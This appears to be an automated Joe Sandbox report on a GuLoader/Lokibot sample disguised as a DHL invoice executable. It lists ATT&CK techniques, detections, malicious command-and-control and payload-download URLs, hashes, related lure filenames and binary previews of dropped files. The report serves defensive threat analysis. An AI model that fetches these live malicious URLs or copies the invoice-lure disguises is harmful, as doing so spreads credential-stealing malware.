        System Shutdown/Reboot
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
        Process Injection
        111
        Virtualization/Sandbox Evasion
        1
        Credentials in Registry
        111
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        Exfiltration Over Bluetooth3
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        DLL Side-Loading
        1
        Access Token Manipulation
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin Shares2
        Data from Local System
        Automated Exfiltration4
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
        Process Injection
        NTDS5
        System Information Discovery
        Distributed Component Object Model1
        Clipboard Data
        Scheduled Transfer15
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        DHL_INVOICE.exe27%VirustotalBrowse
        DHL_INVOICE.exe32%ReversingLabsWin32.Trojan.Guloader
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exe32%ReversingLabsWin32.Trojan.Guloader
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://216.128.145.196/~wellseconds/?p=9651100%Avira URL Cloudphishing
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://216-128-145-196.cprapid.com/~wellseconds/wp-json/100%Avira URL Cloudphishing
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
        http://216-128-145-196.cprapid.com/~wellseconds/wp-json/4%VirustotalBrowse
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://216-128-145-196.cprapid.com/~wellseconds/feed/100%Avira URL Cloudphishing
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://216-128-145-196.cprapid.com/~wellseconds/comments/feed/100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        142.250.185.110
        truefalse
          high
          googlehosted.l.googleusercontent.com
          142.250.185.129
          truefalse
            high
            doc-08-3o-docs.googleusercontent.com
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://216.128.145.196/~wellseconds/?p=9651true
              • Avira URL Cloud: phishing
              unknown
              https://doc-08-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/n391lbrd9ce1mgklk8prf9qvpmeqekqt/1691688000000/04164905018868905653/*/1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv?e=download&uuid=ab3efce8-7fc0-461d-8cd6-5289dc939099false
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.google.comDHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdDHL_INVOICE.exe, 00000002.00000001.936320561.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://doc-08-3o-docs.googleusercontent.com/DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.00000000031C8000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://216-128-145-196.cprapid.com/~wellseconds/wp-json/DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    https://doc-08-3o-docs.googleusercontent.com/cDHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003188000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://doc-08-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/n391lbrdDHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.00000000031EA000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.w.org/DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdDHL_INVOICE.exe, 00000002.00000001.936320561.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://drive.google.com//DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003188000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.quovadis.bm0DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://apis.google.comDHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://nsis.sf.net/NSIS_Error...DHL_INVOICE.exe, B73EF6.exe.2.drfalse
                                  high
                                  http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDDHL_INVOICE.exe, 00000002.00000001.936320561.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                    high
                                    https://ocsp.quovadisoffshore.com0DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://216-128-145-196.cprapid.com/~wellseconds/feed/DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    http://www.gopher.ftp://ftp.DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://216-128-145-196.cprapid.com/~wellseconds/comments/feed/DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.185.129
                                    googlehosted.l.googleusercontent.comUnited States
                                    15169GOOGLEUSfalse
                                    216.128.145.196
                                    unknownUnited States
                                    20473AS-CHOOPAUStrue
                                    142.250.185.110
                                    drive.google.comUnited States
                                    15169GOOGLEUSfalse
                                    Joe Sandbox Version:38.0.0 Beryl
                                    Analysis ID:1289545
                                    Start date and time:2023-08-10 19:18:12 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 15s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:3
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample file name:DHL_INVOICE.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@3/9@2/3
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HDC Information:
                                    • Successful, ratio: 64.6% (good quality ratio 63.6%)
                                    • Quality average: 87.6%
                                    • Quality standard deviation: 21.7%
                                    HCA Information:
                                    • Successful, ratio: 83%
                                    • Number of executed functions: 39
                                    • Number of non-executed functions: 34
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Stop behavior analysis, all processes terminated
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    No simulations
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    216.128.145.196DHL_#U53d1#U7968.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=43026970
                                    DOC_AWB_1100771254.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=7982
                                    #U5831#U50f9#U8acb#U6c42_(NTU_202308-10TW)#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=060773029
                                    s7Rb27E2T8.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=7982
                                    DHL_Invoice_72143002501.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=66663842554017
                                    E-Invoice#001818843.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=66663842554017
                                    checkzx.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=7982
                                    DHL_Invoice_UTJUk1GTKE.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=236353075
                                    UPS_Shipment_Invoice.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=236353075
                                    CreditCard.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=65575353786827
                                    J0370600140.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=5809290034477
                                    AWB#2334578903123.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=5809290034477
                                    U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=529497154189253
                                    DHL_Express_1301284170.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=236353075
                                    DHL_Invoice_UTJU01GTKE.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=236353075
                                    UPS_Shipment_Documents_UPSCBJ19051780131.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=236353075
                                    gunzipped.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=65575353786827
                                    AWB_1ZY0W5038626871089.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=5809290034477
                                    AWB#_772803166933.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=817152758105
                                    E-Invoice#000002380.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196/~wellseconds/?p=236353075
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AS-CHOOPAUSDHL_#U53d1#U7968.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 216.128.145.196
                                    dCbp7tSxY6.exeGet hashmaliciousRedLine, XmrigBrowse
                                    • 136.244.98.226
                                    DOC_AWB_1100771254.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 216.128.145.196
                                    #U5831#U50f9#U8acb#U6c42_(NTU_202308-10TW)#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 216.128.145.196
                                    s7Rb27E2T8.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196
                                    DHL_Invoice_72143002501.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196
                                    file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                    • 108.61.99.145
                                    file.exeGet hashmaliciousRedLineBrowse
                                    • 209.250.248.11
                                    YjNID7X0kj.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                    • 108.61.99.145
                                    lO188m2RAu.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                    • 199.247.0.216
                                    E-Invoice#001818843.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196
                                    LVLjO31m32.exeGet hashmaliciousRedLineBrowse
                                    • 209.250.248.11
                                    9tnn2iO8SH.exeGet hashmaliciousRedLineBrowse
                                    • 209.250.248.11
                                    qtxomLbAT0.exeGet hashmaliciousRedLineBrowse
                                    • 209.250.248.11
                                    AbOIvblSAI.elfGet hashmaliciousMiraiBrowse
                                    • 44.174.145.30
                                    oZbQ5OGw01.elfGet hashmaliciousMiraiBrowse
                                    • 44.174.4.18
                                    file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                    • 108.61.99.145
                                    file.exeGet hashmaliciousRedLineBrowse
                                    • 209.250.248.11
                                    checkzx.exeGet hashmaliciousLokibotBrowse
                                    • 216.128.145.196
                                    9596390fa3510502294f557f423d576f09e965d5e8eb2.exeGet hashmaliciousRedLineBrowse
                                    • 209.250.248.11
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19DHL_#U53d1#U7968.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    LOGISTEC.xlsxGet hashmaliciousSharepointPhisherBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    DOC_AWB_1100771254.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    Scan_20230810_0326419.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    r3ONXhcFey.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    Setup.exeGet hashmaliciousVidarBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    OluraASgWf.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    fjerbregners_patrol.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    WSetup-Password-123.rarGet hashmaliciousVidarBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    #U5831#U50f9#U8acb#U6c42_(NTU_202308-10TW)#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    (#Uc11c#Uc6b8#Ub300#Ud559#Uad50)_230809QUOT_-_0329KR.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    XUCN5hI9xKdNFXa.exeGet hashmaliciousDarkCloudBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    2g3yIqHc6Z.exeGet hashmaliciousVidarBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    tgmap.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    n7lAnu6bK6.exeGet hashmaliciousAmadey, RedLine, RedeemBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    revenue-en-local_lnk.lnkGet hashmaliciousUnknownBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    1iqpDUPZm5.exeGet hashmaliciousDarkCloudBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    kU8gXjwA8Z.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.185.129
                                    • 142.250.185.110
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dllDHL_#U53d1#U7968.exeGet hashmaliciousGuLoader, LokibotBrowse
                                      DHL_#U53d1#U7968.exeGet hashmaliciousGuLoaderBrowse
                                        Ta62k9weDV.exeGet hashmaliciousGuLoaderBrowse
                                          Ta62k9weDV.exeGet hashmaliciousGuLoaderBrowse
                                            HF-2209869481.exeGet hashmaliciousGuLoaderBrowse
                                              HF-2209869481.exeGet hashmaliciousGuLoaderBrowse
                                                RFQ852352-006420025_rev001.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                  RFQ852352-006420025_rev001.exeGet hashmaliciousGuLoaderBrowse
                                                    receipt_001546037_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                      receipt_001546037_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                        PROFORMA INVOICE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          PROFORMA INVOICE.exeGet hashmaliciousUnknownBrowse
                                                            BESTELLUNG Nr. 6010551.exeGet hashmaliciousGuLoaderBrowse
                                                              BESTELLUNG Nr. 6010551.exeGet hashmaliciousGuLoaderBrowse
                                                                SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                  SecuriteInfo.com.NSIS.Injector.AOW.tr.19074.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                    SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exeGet hashmaliciousGuLoaderBrowse
                                                                      SecuriteInfo.com.NSIS.Injector.AOW.tr.19074.exeGet hashmaliciousGuLoaderBrowse
                                                                        SecuriteInfo.com.NSIS.InjectorX-gen.1168.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4347
                                                                          Entropy (8bit):7.958125070410311
                                                                          Encrypted:false
                                                                          SSDEEP:96:pRxzSspJCkWj+jua+BXLnBxsC6no5sc+ih852:hSYajra+RLBxsZno5sct8I
                                                                          MD5:3ED32E9228C60D2E5BCFC01D5B4192DA
                                                                          SHA1:E815A4710B028FD80F66ED890DD6287B04A96DE0
                                                                          SHA-256:801E379112870B55147DB5E678F1EB70DC88C983E4A6F52853F12240ED9501D2
                                                                          SHA-512:188EFCD34B5FFBC1C361E5A22AE283E73D7F27D54F4DC651E0BD06BB0DD42885B0EE0AE24FE098B6BA41AE6CD3D6FF9E08B9121BF30963BD4AFD09E053C77BE7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.8..D.`0..q.;..(.$cIC....9%..Q.^.$...xuQ..w.....I..6C..'.e......I.z.-...Pv%I.4f..6$W8.....L!.&._.:..x...Fx.nmXeP.....@...}.......?\T..5...y7.T{H.K..l.k...r..$...(..k>..KMG..0.k. ......UP..3..X{....w..h.-...l.........u..'...k9...+/..I... o....n=.....g..p.f.S...B..s.g......wXg......P.|.L..!..\....X.)....H....JY.....r.8......E....M.J.j..q.....6:......-.O..i.hp0.3.;G.w.h....|t..o....(.R...7pzd..U..5.8...W.N....w.M.hF..!.....h.............H>.~......-]....Y.si.>...B)..L..n.Qq.Y..F....b..hH.S...-@_f..a......1...j..LT..w?F.|..$s.!. .x/..\..;3...R.B.yy]..\G#........'.......RY.m...o...m..8.-..G\...j..fx+.pC.;.<RP...m.M..2..y...U..y..#z.YX.v.w.GsT...Y...gn../.a.<3...@.|.G.j.C4..5.8W ......M8.iH.%...[._.;Y.y-.|..]S....&aL....../...T#.S<....i}..2e92..8J..ug..*_...(.s.r...tW!...@..X.[...)V.G...0.>......'.R:.}b...\.90.xw]R).+..E.u..v....cl.d..W......<$R...n.....5.,...q.\H.SK...s..H^.J.W..e..X...m.Rf..nJ........@..a.L|A.....Y..(Oo._.~'...z..#...0..`AK.
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):9972
                                                                          Entropy (8bit):7.97977941086316
                                                                          Encrypted:false
                                                                          SSDEEP:192:qNwikWb6/2eAinXoyDzM1g5m/1h3et+18YYJL2ceHPvA:riVeUiYaMq+RYJLxwA
                                                                          MD5:D8EE46409AA776A47DC1F4EA074D0EAB
                                                                          SHA1:7EC8CEB1BFDF6B4A127C0F06A285F87E5EC20449
                                                                          SHA-256:12EFB95020D6E2AEFFD9B5CAC97789DF7ED1CA04FE67DA64F7538DB536F2669C
                                                                          SHA-512:2BF6A089F6EB4E1D72D66BED094B4AF588D83DEEA7E1DEF8813367C03FD1EE0E5E6A84EB6718A30B29E547F1533B9297465B9A767696980A2D647A3E03A49578
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.{.rC...{..t.T.g..<.o6...;....9F.h.U.+....blr...u.....k+.W...0K.^.5..9......{..nf.......a.+|..T^.._....dO.....\...Z..K{...O=.ZG.-g*.;.......uIh...,.7.;..?!....^.T..mtf.3.!4R...o.>....JZ.u<f..~.Q....5..L......WN..m.#..?.ePv...<m...v:..b.....i.y@.......PB....=.}.....v..L...8P..X_.@......:....sI...T)n.\nk.....S..I....ZQ.....`.'....}.b.5f;.fP-W#L...},z..\....w8.....H.F]...gr!0.~..(........Pco.q.X......I.....w3.+.I.{.n..#.......9.n.{.#......Kz....Npb.....x.>....b*.4.....l1.........6...sj.A....J....$.v.....f~..,.....)e..-...........{.3.;<{B..[...!..P.IM......d.@P{.U.'.wCv....\.e.#...p.ep(-.....}.Y.......b.m....e-..`4GZB.t....S..(k..}G..c.).Y.c.m..v..........Iq.}.w.0..,..e.....E..Z...J.WQ.g...\..iMU..F..JN48.g#C..1.........N.%[.Y'..I8]....K.t.>.v..H.DO....W,"...S.)..fA.....r.5.p..y|.D........../.s0k.]`...zwr.@.+....i|5~.P........4a...t|...)....EK..K.n....[.7J....b,..L.d.QVt...D.....),F..^'J.B...L.iI.a...$K.t...nT{._/....RI,_...7:...\.n..
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6090
                                                                          Entropy (8bit):7.969438107575008
                                                                          Encrypted:false
                                                                          SSDEEP:96:7ddGw5JiJ5IOvwK4kVRO7+tELRSsD/tdatk/VrP6gz8svlXiDghLRC4Euj:7ddGUEJp/ObR5D/2tkEg7XKghMmj
                                                                          MD5:A3812720FC0937D2EBA51D972270E2C3
                                                                          SHA1:B45D2053EBE8BA417E16FB99D72D1C620B32B4F7
                                                                          SHA-256:A3F78610F2924B5DDD24A12CF2C59DCBEC131B10A905D99ECCD3B897292715EF
                                                                          SHA-512:F900DFE3326EE94D01035859F8F807CB5BD22604F2359F3D7BB33FA5B8339EF008F3C4E9408E88D3F951B83E59C1E28F590CC09F56A175C00CA306E358740926
                                                                          Malicious:false
                                                                          Preview:.,1..~n...."r...(...q../.w...m.+ =YT...!...#..zXbM...jH...)W...z...,J`7V).<..g8. &.#..)&G8..8...1B....<...7..H[<.+8..l'V........G.....5.[.0..O......z..G.....0^....!..-..z?&D.C&.x...%y..0F..........z..O....[.AR..AG..Rx%5."..A..[o..S...$.d..9{'..2..cm8.H.W.7.....u$b6v.,...Ue6.:0F._^{. ...:.,..K.x..+.h.=.#.WJ..dw......a..qN...../.W...nU..:n..e.....<.....J.2r1.O..T......J.C.D.=.T/.N..Y.4...*...-6...d..w....p"1...+...D...2..s./....B.c>......q.......\.C.4h6G..z......Z....`....}....G1Q.$..,.....4..P.K.l._q.j....*0..-....b.:.eH_...../.P...o6\.h)...[..cQ.....l....A.-W.zz...Rj..q..m....P..+.j..j.....D.N=.z...A.................7-..X...X.;).i......EI.;l...h+#...."3W.h..).."GgG..h..z.9.ZX...%...2n.@.g......w..G..~g....<....+0.g.;..FD6=.C....l.=.bW....q..iLZ..d..u..kPG..@QO.v.........^._g.......=.t.....{jB.....Y.&?.V...E..`.x..ug.|..@.wbz...U.Na.,9{Q.'[2A.;z.zQ..p....Z.N...g.Y.....`W.B.(.(...."..e..DF.Z.tB.E...od~...'..G).....*P....7..%..v..'
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):462263
                                                                          Entropy (8bit):6.9956814364118145
                                                                          Encrypted:false
                                                                          SSDEEP:12288:zfHYe/Lq7DprE0yPz49HO4lSitleL6NKYI1O:zFLqPpE0yLiOUiO
                                                                          MD5:76DCCF4F36F44FA0EEB18551FB499970
                                                                          SHA1:0DF49648603344FAFC1029C0291E9FD1414A1D1D
                                                                          SHA-256:F510EB9E882E6811962B51EFD3319EA0062015E164E3401EE2BFFBB7C14ED0C8
                                                                          SHA-512:4842F448049F89EC6A40DA82AE35E74FD85612F2DC9ABB02912AF0C471C078F2B104EF5D77513D6C44F56DFF44FF8EC7DE23D432B220E0A5725557B65E84115A
                                                                          Malicious:false
                                                                          Preview:.............<<<<.j..J.....""......................U......JJJ............hhh...........F..222.....\...............`.....PP..........@................M.........Y.........~~~....$$........._......hh.................w. .00........''.y..22.O..........[.{...................M......................c...........''''''.........ddd........................ee..bbbbbb..0.............~~....h...v..............nnnn...................[.........xxx.__.`......X......................................ggggg.................33....;..a...............G..............^^................................................................444444.........b.))).....77.....GGG.......T......d.GGG.............aaaa...................... ........................................cc.ppp...............PP..........m.**...................................rrr....................d..............................e...........H......................................`...........................kkkkkk............uuuu.....]]]..GGG..R....2......
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):5.974444797015433
                                                                          Encrypted:false
                                                                          SSDEEP:192:U4A1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6gn9Mw:UYR7SrtTv53tdtTgwF4SQbGPX36g9Mw
                                                                          MD5:637E1FA13012A78922B6E98EFC0B12E2
                                                                          SHA1:8012D44E42CD6D813EA63D5CCBF190FE72E3C778
                                                                          SHA-256:703E17D30A91775F8DDC2648B537FC846FAD6415589A503A4529C36F60A17439
                                                                          SHA-512:932ED6A52E89C4FA587A7C0C3903D69CF89A32DBD46ED8DCB251ABB6C15192D92B1F624C31F0E4BD3E9BF95FC1A55FDB7CEE9DD668E1B4F22DDB95786C063E96
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                                                                          • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                                                                          • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
